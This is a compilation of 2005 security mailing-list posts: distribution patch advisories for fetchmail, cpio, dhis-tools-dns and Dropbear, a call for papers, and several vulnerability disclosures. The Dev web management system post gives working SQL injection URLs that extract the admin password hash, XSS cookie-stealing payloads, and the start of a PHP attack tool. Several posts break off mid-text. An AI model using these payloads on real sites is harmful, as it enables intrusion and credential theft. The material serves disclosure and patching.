MDKSA-2005:236 - Updated fetchmail packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:236 http://www.mandriva.com/security/ ___ Package : fetchmail Date: December 23, 2005 Affected: 10.1, 10.2, 2006.0, Corporate 3.0 ___ Problem Description: Fetchmail before 6.3.1 and before 6.2.5.5, when configured for multidrop mode, allows remote attackers to cause a DoS (application crash) by sending messages without headers from upstream mail servers. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-4348 ___ Updated Packages: Mandriva Linux 10.1: 9c8726e3d841d87b9cc64a9ce3497021 10.1/RPMS/fetchmail-6.2.5-5.3.101mdk.i586.rpm 83258675518c03144515f89ae8c78be4 10.1/RPMS/fetchmailconf-6.2.5-5.3.101mdk.i586.rpm 321a0d1e90bbe0fdb128b96a42ff8e20 10.1/RPMS/fetchmail-daemon-6.2.5-5.3.101mdk.i586.rpm fbfde9ae3b5d9e343282d48b1f1053c8 10.1/SRPMS/fetchmail-6.2.5-5.3.101mdk.src.rpm Mandriva Linux 10.1/X86_64: ff6fb1245bcf6edf9247ad71669d4c46 x86_64/10.1/RPMS/fetchmail-6.2.5-5.3.101mdk.x86_64.rpm efb6b95e1ff2c7723460b9c1ac7e4200 x86_64/10.1/RPMS/fetchmailconf-6.2.5-5.3.101mdk.x86_64.rpm 31c794fae961246e263db99fca4308eb x86_64/10.1/RPMS/fetchmail-daemon-6.2.5-5.3.101mdk.x86_64.rpm fbfde9ae3b5d9e343282d48b1f1053c8 x86_64/10.1/SRPMS/fetchmail-6.2.5-5.3.101mdk.src.rpm Mandriva Linux 10.2: 49e0f1a245c001f08117e20542119796 10.2/RPMS/fetchmail-6.2.5-10.4.102mdk.i586.rpm c8d3515770d91ff96190e6e10c400169 10.2/RPMS/fetchmailconf-6.2.5-10.4.102mdk.i586.rpm 34feb39cc4766bdb9e15df201d085ed0 10.2/RPMS/fetchmail-daemon-6.2.5-10.4.102mdk.i586.rpm fbf579f130896de2c645a8460dd88862 10.2/SRPMS/fetchmail-6.2.5-10.4.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 489f797385cc55c378a3faf50faa898e x86_64/10.2/RPMS/fetchmail-6.2.5-10.4.102mdk.x86_64.rpm d6c123681c17748de5f17c2399fdb7c4 x86_64/10.2/RPMS/fetchmailconf-6.2.5-10.4.102mdk.x86_64.rpm 9e6b77b062ab162d4c215032dc7714f3 x86_64/10.2/RPMS/fetchmail-daemon-6.2.5-10.4.102mdk.x86_64.rpm fbf579f130896de2c645a8460dd88862 x86_64/10.2/SRPMS/fetchmail-6.2.5-10.4.102mdk.src.rpm Mandriva Linux 2006.0: e09c0856591976733a1bc8041e8eb93c 2006.0/RPMS/fetchmail-6.2.5-11.2.20060mdk.i586.rpm aba5a8c643b15149976c30ba6540 2006.0/RPMS/fetchmailconf-6.2.5-11.2.20060mdk.i586.rpm d683b66431939e6106b3fee6b8b500f5 2006.0/RPMS/fetchmail-daemon-6.2.5-11.2.20060mdk.i586.rpm bb8c5a81a1299a855594849851615d17 2006.0/SRPMS/fetchmail-6.2.5-11.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 2567bef9f4fc2b8d91fae1e5539d5920 x86_64/2006.0/RPMS/fetchmail-6.2.5-11.2.20060mdk.x86_64.rpm 33a88c8055504ab5c741be8c84ab1a81 x86_64/2006.0/RPMS/fetchmailconf-6.2.5-11.2.20060mdk.x86_64.rpm b2e430f97aed6f30e18144ee57b17b8f x86_64/2006.0/RPMS/fetchmail-daemon-6.2.5-11.2.20060mdk.x86_64.rpm bb8c5a81a1299a855594849851615d17 x86_64/2006.0/SRPMS/fetchmail-6.2.5-11.2.20060mdk.src.rpm Corporate 3.0: 51c54e861eec7692a76b3f5b91bab4b9 corporate/3.0/RPMS/fetchmail-6.2.5-3.3.C30mdk.i586.rpm 41c74970c74af1fce8eae213f60d108e corporate/3.0/RPMS/fetchmailconf-6.2.5-3.3.C30mdk.i586.rpm 53fe277159d6771d83d40c99c3418f51 corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.3.C30mdk.i586.rpm 477f8ec8d7ccaba94a529fd4ead38f11 corporate/3.0/SRPMS/fetchmail-6.2.5-3.3.C30mdk.src.rpm Corporate 3.0/X86_64: 7f806d8e2858a008799f0766503f0c7a x86_64/corporate/3.0/RPMS/fetchmail-6.2.5-3.3.C30mdk.x86_64.rpm cb3793ad31fb347d9daf894d7ec7d318 x86_64/corporate/3.0/RPMS/fetchmailconf-6.2.5-3.3.C30mdk.x86_64.rpm 8030300459d198b72b9e9a83909fc0fb x86_64/corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.3.C30mdk.x86_64.rpm 477f8ec8d7ccaba94a529fd4ead38f11 x86_64/corporate/3.0/SRPMS/fetchmail-6.2.5-3.3.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version:
MDKSA-2005:237 - Updated cpio packages fix buffer overflow on x86_64
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:237 http://www.mandriva.com/security/ ___ Package : cpio Date: December 23, 2005 Affected: 10.2, 2006.0 ___ Problem Description: A buffer overflow in cpio 2.6 on 64-bit platforms could allow a local user to create a DoS (crash) and possibly execute arbitrary code when creating a cpio archive with a file whose size is represented by more than 8 digits. The updated packages have been patched to correct these problems. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4268 ___ Updated Packages: Mandriva Linux 10.2: b0400cb8878a93cc4e4d4326a0a46641 10.2/RPMS/cpio-2.6-3.3.102mdk.i586.rpm ad70b46181e5a9ae2ca7ed97bb2c3853 10.2/SRPMS/cpio-2.6-3.3.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 0a7ca9d0d1de932219a76dcee4195ff8 x86_64/10.2/RPMS/cpio-2.6-3.3.102mdk.x86_64.rpm ad70b46181e5a9ae2ca7ed97bb2c3853 x86_64/10.2/SRPMS/cpio-2.6-3.3.102mdk.src.rpm Mandriva Linux 2006.0: 571d79d56efac2687713e63180f10049 2006.0/RPMS/cpio-2.6-5.1.20060mdk.i586.rpm 998e92b468e495d779efd10daacae3ad 2006.0/SRPMS/cpio-2.6-5.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 0bd4e5c9d85826c706232e21d3393317 x86_64/2006.0/RPMS/cpio-2.6-5.1.20060mdk.x86_64.rpm 998e92b468e495d779efd10daacae3ad x86_64/2006.0/SRPMS/cpio-2.6-5.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDrHPemqjQ0CJFipgRApCrAJ40iYNwqiNcgLiIrd5zh3tbuAkFSACgpiZ3 tD9IdCprIvkMOdpAqBAkdzU= =UtT3 -END PGP SIGNATURE-
Dev web management system <= 1.5 SQL injection / cross site scripting
Dev web management system <= 1.5 SQL injection / cross site scripting -
software:
site: http://dev-wms.sourceforge.net/
description: "Dev is powerful and very flexible content management
system for web portals[..]"
---
vulnerabilities:
i) in openforum.php at line 19:
...
$miestnost=mysql_fetch_array(mysql_query("SELECT id, nazov, editorid FROM
forum1cat WHERE id=$cat",$spojenie));
...
"cat" argument is not properly sanitized before to be passed to a query,
so you can inject SQL statements regardless of magic_quotes_gpc settings, poc:
http://[target]/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)
now you have at screen site admnistration MD5 password hash...
ii) in getfile.php:
...
include_once ("./register_globals.php");
if (!$cat) die ("Access denied");
include "admin/_dbase.conf.php";
$spojenie=mysql_pconnect
($conf_mysql_server,$conf_mysql_user_name,$conf_mysql_password);
mysql_select_DB ($conf_mysql_database_name);
include "class_configuration.php";
$configuration->ConfLoadDBtoPHP();
include "admin/_config.php";
echo "SELECT icon, icontype FROM prispevok1cat WHERE cat LIKE '$cat' LIMIT 1";
$image=mysql_fetch_array(mysql_query("SELECT icon, icontype FROM prispevok1cat
WHERE cat LIKE '$cat' LIMIT 1", $spojenie));
if ($image) {
header ("Content-type: $image[icontype]");
echo $image[icon];
} else {
echo "Image not found";
}
...
if magic_quotes_gpc off, same results with:
http://[target]/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
iii)
also we have sql injection (hard to exploit?) )in download_now.php at line
31-33:
...
$out=mysql_fetch_array(mysql_query("SELECT Count(id) FROM downloadmanager WHERE
id = ".$target,$spojenie));
if ($out[0]==1) {
$out2 = mysql_fetch_array(mysql_query("SELECT * FROM downloadmanager
WHERE id = $target",$spojenie));
...
http://[target]/[path]/download_now.php?target=9[SQL]
iv) xss:
http://[target]/[path]/add.php?language[ENTER_ARTICLE_TITLE]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[SPECIFY_ZONE]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[ENTER_ARTICLE_HEADER]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[ENTER_ARTICLE_BODY]=";);}}-->alert(document.cookie)
this is the tool for i) & ii):
http://rgod.altervista.org #
# #
# -> this works regardless of magic_quotes_gpc setting#
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Prohibit the taking of omens, and do away with superstitious #
# doubts. Then, until death itself comes, no calamity need be feared."#
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'* Dev <=1.5 \'cat\' SQL injection **
body {background-color:#11; SCROLLBAR-ARROW-COLOR:
#ff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FF !important} input {background-color:#303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important}checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #11; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em!important} h3 {font-size: 0.8em
!important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .S
CFP - IT Underground 2006, Prague, Czech Republic
Dear Bugtraq readers, I'd like to announce the call for papers for the IT Underground 2006, a two-day conference organized by Software Conferences and hakin9.lab team in 23-24 February 2006, Prague, Czech Republic. IT Underground 2006 is a fifth edition of a conference dedicated to IT security issues, where remarkable authorities will share their knowledge and experience with IT specialists. In previous editions we had pleasure to listen to: Ofir Arkin, Maximillian Dornseif, David h1kari Hulton, Chuck Willis, Charl Van der Walt, Shalom Carmel, Martin Herfurt, Adam Laurie, Marcel Holtmann, Alexander Kornbrust, Saumil Udayan Shah, Robert Lee Ayers, Dave Aitel, Stefano Zanero, Thorsten Holz, Joanna Rutkowska, Michael Shema, Piotr Sobolewski, Michal Szymanski, Paul Wouters, Rakan El-Khalil, Wojciech Dworakowski, K.K. Mookhey, Pawel Krawczyk. The dead line for lecture proposals is the 15th of January, 2006. All the detailed information you can find on http://www.itUnderground.org/ We hope that you find our offer interesting. Please, contact me to discuss further details of our cooperation. IT Underground 2006 - basic characteristics. When: 23-24 February 2006 Where: Prague, Czech Republic Topic: IT Security We assure: - hotel accommodation and transfer, - full support for your presentation, both before and during the conference, - providing the necessary technical facilities for the presentation, - assistance in acquiring and publishing presentation materials, information about your lecture in the conference brochure, - supervising and directing the overall progress of the conference. -- Piotr Sobolewski [EMAIL PROTECTED]
Found new bug
In GOD We Trust Kachal667 Under9round Team (KuT) Hi, Here's my(LrK) new advisory about PHP Website. PHP System - Input Data(simple XSS) vulnerabilities Date: 02/11/2005 Summary --- PHP is a language for programming and it is very good language for portal programming. we se some portal with php like: PHPBB , PHPNuke and Details --- If programmer is not professional, probably he will have make a mistake. if he dont stop some tages like: alert(document.cookie) http://eg.com/deface.htm> for fix it u should write simple code for stopping iframe or script or ... http://www.PHP.com Lone Rider Knight
Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure
Airscanner Mobile Security Advisory #05083101: Spb Kiosk Engine Administrator Password & Information Disclosure (Local) Product: Kiosk Engine 1.0.0.1 Platform: Tested on Windows Mobile Pocket PC 2003 Requirements: Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 installed Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com Mobile Antivirus Researchers Association http://www.mobileav.org August 30 2005 Risk Level: Medium. Local attacker gains unauthorized control over device. Summary: Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In this mode, the target applications are the only ones that can be used on a specific Pocket PC device. Details: Kiosk Engine allows an administrator to enter their passcode to gain full control over a PDA with the Kiosk Engine installed. This passcode is stored in the registry as plaintext and can be obtained several different ways (eg. remote registry access). Workaround: None Vendor Response Waiting response. Online Advisory: http://www.airscanner.com/security/05083101_kioskpass.htm Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[SECURITY] [DSA 928-1] New dhis-tools-dns packages fix insecure temporary file creation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 928-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze December 27th, 2005 http://www.debian.org/security/faq - -- Package: dhis-tools-dns Vulnerability : insecure temporary file Problem type : local Debian-specific: no CVE ID : CVE-2005-3341 Javier Fernández-Sanguino Peña from the Debian Security Audit project discovered that two scripts in the dhis-tools-dns package, DNS configuration utilities for a dynamic host information System, which are usually executed by root, create temporary files in an insecure fashion. The old stable distribution (woody) does not contain a dhis-tools-dns package. For the stable distribution (sarge) these problems have been fixed in version 5.0-3sarge1. For the unstable distribution (sid) these problems have been fixed in version 5.0-5. We recommend that you upgrade your dhis-tools-dns package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1.dsc Size/MD5 checksum: 623 b5bb7245baec1eaea19bca6fed93a20d http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1.diff.gz Size/MD5 checksum: 4711 d2095bb5dbd01ad45eac91f17aa71dfa http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0.orig.tar.gz Size/MD5 checksum: 3535 9674e661082ad955010efd6d06686b82 Alpha architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_alpha.deb Size/MD5 checksum: 7978 207fa0d62d5cf58685f7f0db185e08d4 http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_alpha.deb Size/MD5 checksum: 8678 61934b801e98457666f28fd80e43dd53 AMD64 architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_amd64.deb Size/MD5 checksum: 7592 c98df83e0c69f857ab6d098c4c09ec41 http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_amd64.deb Size/MD5 checksum: 8090 b6c4401b2cad0e2cb8fef248a783cc48 ARM architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_arm.deb Size/MD5 checksum: 7432 03343675acb57b139d29ce92e0dd7750 http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_arm.deb Size/MD5 checksum: 7854 d58346c9292b0b5991f83ef3d9dd7a1d Intel IA-32 architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_i386.deb Size/MD5 checksum: 7330 29c880357067715b4ea639804f58ee6a http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_i386.deb Size/MD5 checksum: 7632 523f6a69be038c1d8ccb75f5e0cc2da9 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_ia64.deb Size/MD5 checksum: 8692 091e101db6ebe1088b9f204611d6d20d http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_ia64.deb Size/MD5 checksum: 9396 3e1d7ed7784f23c2d1437a6c0e935287 HP Precision architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_hppa.deb Size/MD5 checksum: 8106 40ffc96aa7b1bdbdf075a45ff4a020ca http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_hppa.deb Size/MD5 checksum: 8666 528294b6c32e7d694d7f5336294fccae Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_m68k.deb Size/MD5 checksum: 7352 6c552aa90253a73c05203cc23fc08a49 http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_m68k.deb Size/MD5 checksum: 7774 6f56252d7552d86f1c26e61efe497b79 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_mips.deb Size/MD5 checksum: 8292 5874
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
---
| BuHa Security-Advisory #4 |Dec 24th, 2005 |
---
| Vendor | M$ Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (DoS - Null Pointer Dereference) |
---
o Description:
=
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: #7d663471
===
Following HTML code forces M$ IE 6 to crash:
>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html
These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi= eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246
7d663469 8bff mov edi,edi
7d66346b 55 pushebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110 mov eax,[ecx+0x10]
FAULT ->7d663471 66833823 cmp word ptr [eax],0x23
ds:0023:=
7d663475 7405 jz mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40 inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508 pushdword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002 add eax,0x2
7d663484 50 pusheax
7d663485 e8466cebff callmshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 testeax,eax
7d663495 0f9cc1 setlcl
7d663498 8bc1 mov eax,ecx
7d66349a 5d pop ebp
7d66349b c20400 ret 0x4
The access violation results in a null pointer dereference and is not
exploitable.
M$ IE parses the attribute value of 'datasrc' ("[n].[m]") in the
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')
The reason for the crash is that the 0 byte long [n] (no memory is allocated
for this string) is used without any validation.
For example:
> char *t = NULL;
>
> if(t[0] = 0x23)
o Vulnerable versions:
=
The DoS vulnerability was successfully tested on:
> M$ IE 6.0 - Windoze XP Pro SP2
> M$ IE 6.0 - Windoze 2k SP4
> M$ IE 5.5 - Windoze XP Pro SP2
> M$ IE 5.01 - Windoze XP Pro SP2
o Disclosure Timeline:
=
10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=
Christian Deneke <[EMAIL PROTECTED]>
- --
Thomas Waldegger <[EMAIL PROTECTED]>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt
-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-END PGP SIGNATURE-
[ GLSA 200512-13 ] Dropbear: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200512-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Dropbear: Privilege escalation Date: December 23, 2005 Bugs: #116006 ID: 200512-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow in Dropbear could allow authenticated users to execute arbitrary code as the root user. Background == Dropbear is an SSH server and client with a small memory footprint. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/dropbear < 0.47>= 0.47 Description === Under certain conditions Dropbear could fail to allocate a sufficient amount of memory, possibly resulting in a buffer overflow. Impact == By sending specially crafted data to the server, authenticated users could exploit this vulnerability to execute arbitrary code with the permissions of the SSH server user, which is the root user by default. Workaround == There is no known workaround at this time. Resolution == All Dropbear users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dropbear-0.47" References == [ 1 ] CVE-2005-4178 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4178 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200512-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpeDA3mdGn7z.pgp Description: PGP signature
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 --- | BuHa Security-Advisory #5 |Dec 24th, 2005 | --- | Vendor | M$ Internet Explorer 6.0 | | URL | http://www.microsoft.com/windows/ie/ | | Version | <= 6.0.2900.2180.xpsp_sp2 | | Risk | Low (DoS - Null Read Dereference) | --- o Description: = Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by Microsoft and currently available as part of Microsoft Windows. Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Denial of Service: #7d6c74b1 === Following HTML code forces M$ IE 6 to crash: > > > > > > > > > > Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html These are the register values and the ASM dump at the time of the access violation: eax=0129040a ebx=0129ef30 ecx=0001 edx=012945f0 esi= edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 7d6c748b 6a0b push0xb 7d6c748d 33c0 xor eax,eax 7d6c748f 59 pop ecx 7d6c7490 8bfe mov edi,esi 7d6c7492 f3ab rep stosd 7d6c7494 8b45f8 mov eax,[ebp-0x8] 7d6c7497 8906 mov [esi],eax 7d6c7499 897228 mov [edx+0x28],esi 7d6c749c e9af01 jmp mshtml+0x217650 (7d6c7650) 7d6c74a1 8b4728 mov eax,[edi+0x28] 7d6c74a4 8b7028 mov esi,[eax+0x28] 7d6c74a7 897728 mov [edi+0x28],esi 7d6c74aa 8b4320 mov eax,[ebx+0x20] 7d6c74ad 668b4002 mov ax,[eax+0x2] FAULT ->7d6c74b1 8b4e24 mov ecx,[esi+0x24] ds:0023:0024= 7d6c74b4 66250030 and ax,0x3000 7d6c74b8 662d0010 sub ax,0x1000 7d6c74bc 66f7d8 neg ax 7d6c74bf 897510 mov [ebp+0x10],esi 7d6c74c2 1bc0 sbb eax,eax 7d6c74c4 40 inc eax 7d6c74c5 50 pusheax 7d6c74c6 e80c8efeff callmshtml+0x2002d7 (7d6b02d7) 7d6c74cb 0fb6c0 movzx eax,al 7d6c74ce 48 dec eax 7d6c74cf 83f80c cmp eax,0xc 7d6c74d2 0f877b01 jnbemshtml+0x217653 (7d6c7653) 7d6c74d8 ff2485c7796c7d jmp dword ptr [mshtml+0x2179c7 (7d6c79c7)+eax*4] 7d6c74df 8b4e20 mov ecx,[esi+0x20] 7d6c74e2 f6410208 testbyte ptr [ecx+0x2],0x8 7d6c74e6 7419 jz mshtml+0x217501 (7d6c7501) 7d6c74e8 8b45fc mov eax,[ebp-0x4] 7d6c74eb ff7014 pushdword ptr [eax+0x14] 7d6c74ee 8b4610 mov eax,[esi+0x10] 7d6c74f1 03460c add eax,[esi+0xc] 7d6c74f4 50 pusheax 7d6c74f5 e899ba0100 callmshtml+0x232f93 (7d6e2f93) It appears to be a null read dereference crash which is not exploitable. o Vulnerable versions: = The DoS vulnerability was successfully tested on: > M$ IE 6 SP2 - Win XP Pro SP2 > M$ IE 6 - Win 2k SP4 o Disclosure Timeline: = 26 Nov 05 - DoS vulnerability discovered. 15 Dec 05 - Vendor contacted. 20 Dec 05 - Vendor confirmed vulnerability. 24 Dec 05 - Public release. o Solution: == There is no patch yet. The vulnerability will be fixed in an upcoming service pack according to the Microsoft Security Response Center. o Credits: = Christian Deneke <[EMAIL PROTECTED]> - -- Thomas Waldegger <[EMAIL PROTECTED]> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address '[EMAIL PROTECTED]' is more a spam address than a regular mail address therefore it's possible that I ignore some mails. Please use the contact details at morph3us.org to contact me. Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt -BEGIN PGP SIGNATURE- Version: n/a Comment: http://morph3us.org/ iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU 07WulbyPImV5j9zbwi56gOo= =JX5G -END PGP SIGNATURE-
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3
